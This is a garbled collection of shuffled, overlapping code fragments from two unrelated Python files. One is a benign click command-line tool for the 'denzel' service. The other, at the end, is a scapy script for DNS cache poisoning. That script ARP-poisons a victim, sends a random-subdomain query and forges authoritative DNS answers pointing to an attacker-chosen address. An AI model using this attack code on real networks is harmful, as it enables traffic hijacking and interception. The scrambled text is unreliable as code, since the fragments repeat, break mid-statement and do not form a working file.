GPU\",", "stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command()", "default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" 
commands.logworker(live) # --------", "images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # -------- start", "commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def", "skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints", "def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command()", "-------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow", "status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine status", "@click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service,", "@cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu):", "logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES),", "@click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts", "-------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show", "def 
cli(): pass # -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support", "launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int,", "type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\"", "help='Live status view', show_default=True) def status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live)", "-------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response", "def response(sync, timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\" if sync is", "-------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine status of", "\"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service',", "def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker -------- @cli.command()", "default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all", "on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services", "@cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI", "or --async') if sync and timeout <= 0: raise 
click.ClickException('Sync timeout must be", "@click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel", "all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the", "-------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command() def", "@cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command() def restart():", "cli(): pass # -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for", "all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according", "commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh", "@click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in", "live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False,", "worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from", "commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service',", "@cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live)", "output', show_default=True) def logworker(live): 
\"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command()", "@click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all", "-------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge):", "-------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh on all services\"\"\" commands.updateosreqs()", "worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service',", "requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt", "click.ClickException('Must pass --sync or --async') if sync and timeout <= 0: raise click.ClickException('Sync", "type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service) #", "help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge)", "commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True)", "def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch", "@cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh on all services\"\"\" commands.updateosreqs() #", "required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in seconds')", "-------- response 
-------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True,", "services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all',", "# -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True)", "response timeout in seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async) and sync", "def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command() def stop(): \"\"\"Stop", "commands.start() # -------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() # --------", "@click.group() def cli(): pass # -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False,", "logs output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # --------", "requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target", "-------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name,", "-------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # --------", "seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\" if sync", "def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command()", "type=str) 
@click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the", "logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live',", "in seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\" if", "response manner (sync/async) and sync timeout\"\"\" if sync is None: raise click.ClickException('Must pass", "monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True)", "default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True)", "show_default=True) def shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service) # -------- response --------", "services and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell", "@cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs --------", "default=False, help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live)", "help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port,", ".. 
import config import click @click.group() def cli(): pass # -------- startproject --------", "# -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port',", "services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True)", "response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync", "-------- @cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs", "if sync is None: raise click.ClickException('Must pass --sync or --async') if sync and", "default=False, help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project", "<reponame>eliorc/denzel from .. import commands from .. import config import click @click.group() def", "\"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view',", "import commands from .. 
import config import click @click.group() def cli(): pass #", "default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service)", "\"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow", "shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout',", "and sync timeout\"\"\" if sync is None: raise click.ClickException('Must pass --sync or --async')", "-------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect", "response(sync, timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\" if sync is None:", "import config import click @click.group() def cli(): pass # -------- startproject -------- @cli.command()", "all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start()", "updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # --------", "\"\"\"Examine status of services and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command() def", "def updateosreqs(): \"\"\"Run shell commands from requirements.sh on all services\"\"\" commands.updateosreqs() # --------", "def shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command()", "\"\"\"Connect to service bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True,", 
"@click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\",", "-------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor", "services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs(): \"\"\"Update services according to", "synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in seconds') def response(sync, timeout):", "restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command()", "updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command()", "timeout in seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\"", "NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu)", "-------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine", "help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show", "according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services", "endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, 
monitor_port):", "config import click @click.group() def cli(): pass # -------- startproject -------- @cli.command() @click.argument('name',", "denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int,", "show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) # --------", "def stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command() def restart(): \"\"\"Restart", "type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def", "port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) #", "to service bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True,", "default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True)", "service bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses", "requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES +", "live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def", "-------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", 
show_default=True)", "\"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart()", "show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # --------", "and deletes all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def start(): \"\"\"Start", "-------- updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh on all", "from .. import commands from .. import config import click @click.group() def cli():", "stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\"", "status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live) # -------- updateosreqs -------- @cli.command()", "show_default=True, help='Sync response timeout in seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async)", "the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) #", "timeout): \"\"\"Set response manner (sync/async) and sync timeout\"\"\" if sync is None: raise", "\"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop()", "restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status", "commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\",", "\"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def start():", "gpu): \"\"\"Builds the denzel project skeleton\"\"\" 
commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command()", "show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service',", "@cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False,", "show_default=True) def status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live) # -------- updateosreqs", "commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\",", "UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port)", "service logs\"\"\" commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs", "@cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes", "sync and timeout <= 0: raise click.ClickException('Sync timeout must be greater than 0')", "def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel',", "and timeout <= 0: raise click.ClickException('Sync timeout must be greater than 0') commands.response(sync," ]
[ "on 2020-04-18 20:25 from django.db import migrations, models class Migration(migrations.Migration): initial = True", "[ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', models.CharField(max_length=128)), ('panorama',", "# Generated by Django 3.0.5 on 2020-04-18 20:25 from django.db import migrations, models", "name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', models.CharField(max_length=128)), ('panorama', models.BooleanField()), ],", "= [ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)),", "3.0.5 on 2020-04-18 20:25 from django.db import migrations, models class Migration(migrations.Migration): initial =", "operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key',", "<reponame>rodvand/netbox-paloalto<gh_stars>10-100 # Generated by Django 3.0.5 on 2020-04-18 20:25 from django.db import migrations,", "[ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname',", "migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', models.CharField(max_length=128)), ('panorama', models.BooleanField()),", "= [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', 
models.CharField(max_length=128)),", "by Django 3.0.5 on 2020-04-18 20:25 from django.db import migrations, models class Migration(migrations.Migration):", "django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ]", "True dependencies = [ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True,", "('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', models.CharField(max_length=128)), ('panorama', models.BooleanField()), ], ), ]", "Django 3.0.5 on 2020-04-18 20:25 from django.db import migrations, models class Migration(migrations.Migration): initial", "20:25 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies =", "from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [", "] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)),", "models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [", "migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations =", "class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel(", "Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='FirewallConfig',", "initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[", "= True dependencies = [ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id',", "dependencies = [ ] operations = [ migrations.CreateModel( name='FirewallConfig', fields=[ ('id', models.AutoField(auto_created=True, 
primary_key=True,", "import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations", "fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)), ('hostname', models.CharField(max_length=50)), ('api_key', models.CharField(max_length=128)), ('panorama', models.BooleanField()), ], ),", "Generated by Django 3.0.5 on 2020-04-18 20:25 from django.db import migrations, models class", "2020-04-18 20:25 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies" ]
[ "<gh_stars>0 import socket host = '' port = 12345 addr = (host, port)", "except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if", "'quit': break print(data) sdata = input('> ') + '\\r\\n' cli_sock.send(sdata.encode()) # 将str编码为bytes cli_sock.close()", "break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() ==", "try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data", "(host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try:", "port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try: cli_sock,", "= s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() #", "socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr = s.accept()", "socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt:", "print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit':", "12345 addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1)", "1) s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break", "s.listen(1) while True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr)", "while True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while", "把bytes类型解码为str类型 if data.strip() == 'quit': break print(data) sdata = input('> ') + '\\r\\n'", "= socket.socket() s.setsockopt(socket.SOL_SOCKET, 
socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr =", "s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,',", "cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit': break print(data) sdata = input('> ')", "socket host = '' port = 12345 addr = (host, port) s =", "host = '' port = 12345 addr = (host, port) s = socket.socket()", "= 12345 addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr)", "data.strip() == 'quit': break print(data) sdata = input('> ') + '\\r\\n' cli_sock.send(sdata.encode()) #", "s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr = s.accept() except", "break print(data) sdata = input('> ') + '\\r\\n' cli_sock.send(sdata.encode()) # 将str编码为bytes cli_sock.close() s.close()", "= (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True:", "import socket host = '' port = 12345 addr = (host, port) s", "s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while True: try: cli_sock, cli_addr", "True: try: cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True:", "if data.strip() == 'quit': break print(data) sdata = input('> ') + '\\r\\n' cli_sock.send(sdata.encode())", "'' port = 12345 addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,", "port = 12345 addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)", "= '' port = 12345 addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET,", "True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit': break print(data) sdata", "= cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if 
data.strip() == 'quit': break print(data) sdata = input('>", "# 把bytes类型解码为str类型 if data.strip() == 'quit': break print(data) sdata = input('> ') +", "addr = (host, port) s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(addr) s.listen(1) while", "s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型", "while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit': break print(data)", "cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode()", "data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit': break print(data) sdata =", "== 'quit': break print(data) sdata = input('> ') + '\\r\\n' cli_sock.send(sdata.encode()) # 将str编码为bytes", "cli_sock, cli_addr = s.accept() except KeyboardInterrupt: break print('Hello,', cli_addr) while True: data =", "cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip() == 'quit': break", "KeyboardInterrupt: break print('Hello,', cli_addr) while True: data = cli_sock.recv(1024).decode() # 把bytes类型解码为str类型 if data.strip()" ]
[ "arppoison import sys import socket def silent(args): # ARP poison the vicitims (two", "args.soaIP: arppoison(args.victim, ip) # send query request to the victim args.randomSubdomain = utils.getRandomSubdomain()", "the vicitims (two way ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip) #", "dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in", "args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain))", "\\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print", "IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd,", "import argparse from scapy.all import ARP, Ether, sniff, sendp, send, IP, UDP, DNS,", "sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR from vars import ccolors import", "not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP):", "the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\", "victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP):", "response to the victim (it will think its from the authoritative DNS) spoof_pkt", "import sys import socket def silent(args): # ARP poison the vicitims (two way", "and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /", "send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in", "+ \"Victim DNS 
